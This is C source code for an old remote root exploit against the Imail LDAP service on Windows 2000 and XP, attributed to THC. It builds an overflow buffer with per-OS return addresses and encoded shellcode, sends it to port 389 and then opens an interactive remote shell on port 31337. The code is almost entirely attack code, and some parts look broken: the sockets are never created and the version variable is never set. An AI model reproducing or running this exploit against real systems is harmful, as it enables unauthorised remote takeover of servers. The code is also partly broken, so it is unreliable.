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- /*****************************************************************************/
- /* THCimail 0.1 - Wind0wZ remote root exploit */
- /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
- /* */
- /* Bug was found by idefense or some idefense slaves ;) */
- /* http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities*/
- /* */
- /* compile with MS Visual C++ : cl THCimail.c */
- /* */
- /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
- /* scut, stealth, FtR and Random */
- /*****************************************************************************/
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <winsock2.h>
- #pragma comment(lib, "ws2_32.lib")
- char *WIN2KEN = "\xc4\x2a\x02\x75";
- char *WIN2KPG = "\xc4\x2a\xf9\x74";
- char *WINXPSP1G = "\xfe\x63\xa1\x71";
- #define jumper "\xeb\x06\x4a\x43"
- char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
- char shellcode[] =
- "\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
- "\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
- "\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
- "\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
- "\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
- "\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
- "\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
- "\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
- "\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
- "\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
- "\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
- "\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
- "\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
- "\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
- "\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
- "\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
- "\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
- "\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
- "\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
- "\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
- "\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
- "\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
- "\xda\x63\xe5\x70\x70\xda\x6f";
- void usage();
- void shell(int sock);
- int main(int argc, char *argv[])
- {
- unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
- unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
- unsigned int IMAIL6_7=60;
- unsigned int IMAIL_8=68;
- struct sockaddr_in mytcp;
- struct hostent * hp;
- WSADATA wsaData;
- printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
- printf("tested on Imail 6-8\n");
- printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
- if(argc<4 || argc>4)
- usage();
- ver = (unsigned short)atoi(argv[3]);
- switch(ver)
- {
- case 0:
- break;
- case 1:
- break;
- default:
- printf("\nYou entered an illegal version !\n\n");
- usage();
- exit(-1);
- }
- crapbuf1 = malloc(IMAILVER);
- memset(crapbuf1,'X',IMAILVER);
- printf("imailver = %d\n",IMAILVER);
- crapbuf2 = malloc(2220);
- memset(crapbuf2,'X',2220);
- finalbuffer = malloc(2650);
- memset(finalbuffer,0,2650);
- printf("\n[*] building buffer\n");
- strcat(finalbuffer,ldapshit);
- strcat(finalbuffer,crapbuf1);
- strcat(finalbuffer,jumper);
- os = (unsigned short)atoi(argv[2]);
- switch(os)
- {
- case 0:
- strcat(finalbuffer,WIN2KPG);
- break;
- case 1:
- strcat(finalbuffer,WIN2KPG);
- break;
- case 2:
- strcat(finalbuffer,WINXPSP1G);
- break;
- default:
- printf("\nYou entered an illegal OS !\n\n");
- usage();
- exit(-1);
- }
- strcat(finalbuffer,shellcode);
- strcat(finalbuffer,crapbuf2);
- if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
- {
- printf("WSAStartup failed !\n");
- exit(-1);
- }
- hp = gethostbyname(argv[1]);
- if (!hp){
- addr = inet_addr(argv[1]);
- }
- if ((!hp) && (addr == INADDR_NONE) )
- {
- printf("Unable to resolve %s\n",argv[1]);
- exit(-1);
- }
- if (!sock)
- {
- printf("socket() error...\n");
- exit(-1);
- }
- if (hp != NULL)
- memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
- else
- mytcp.sin_addr.s_addr = addr;
- if (hp)
- mytcp.sin_family = hp->h_addrtype;
- else
- mytcp.sin_family = AF_INET;
- mytcp.sin_port=htons(389);
- printf("[*] connecting the target\n");
- rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
- if(rc==0)
- {
- send(sock,finalbuffer,2650,0);
- printf("[*] Exploit send successfully ! Sleeping a while ....\n");
- Sleep(1000);
- }
- else
- printf("\nCan't connect to ldap port!\n");
- if(rc==0)
- {
- printf("[*] Trying to get a shell\n\n");
- mytcp.sin_port = htons(31337);
- rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
- if(rc!=0)
- {
- printf("can't connect to port 31337 ;( maybe firewalled ...\n");
- exit(-1);
- }
- shell(sock2);
- }
- shutdown(sock,1);
- closesocket(sock);
- free(crapbuf1);
- free(crapbuf2);
- free(finalbuffer);
- exit(0);
- }
- void usage()
- {
- unsigned int a;
- printf("\nUsage: <Host> <OS> <Imail Version>\n");
- printf("Sample: THCimail 0 1\n\n");
- printf("OS:\n");
- printf("0 - Windows 2000 Server english all service packs\n");
- printf("1 - Windows 2000 Professional german\n");
- printf("2 - Windows XP SP1 german\n\n");
- printf("Imail Version:\n");
- printf("0 - Imail 6+7\n");
- printf("1 - Imail 8\n");
- exit(0);
- }
- void shell(int sock)
- {
- int l;
- char buf[1024];
- struct timeval time;
- unsigned long ul[2];
- time.tv_sec = 1;
- time.tv_usec = 0;
- while (1)
- {
- ul[0] = 1;
- ul[1] = sock;
- l = select (0, (fd_set *)&ul, NULL, NULL, &time);
- if(l == 1)
- {
- l = recv (sock, buf, sizeof (buf), 0);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- l = write (1, buf, l);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- }
- else
- {
- l = read (0, buf, sizeof (buf));
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- l = send(sock, buf, l, 0);
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- }
- }
- }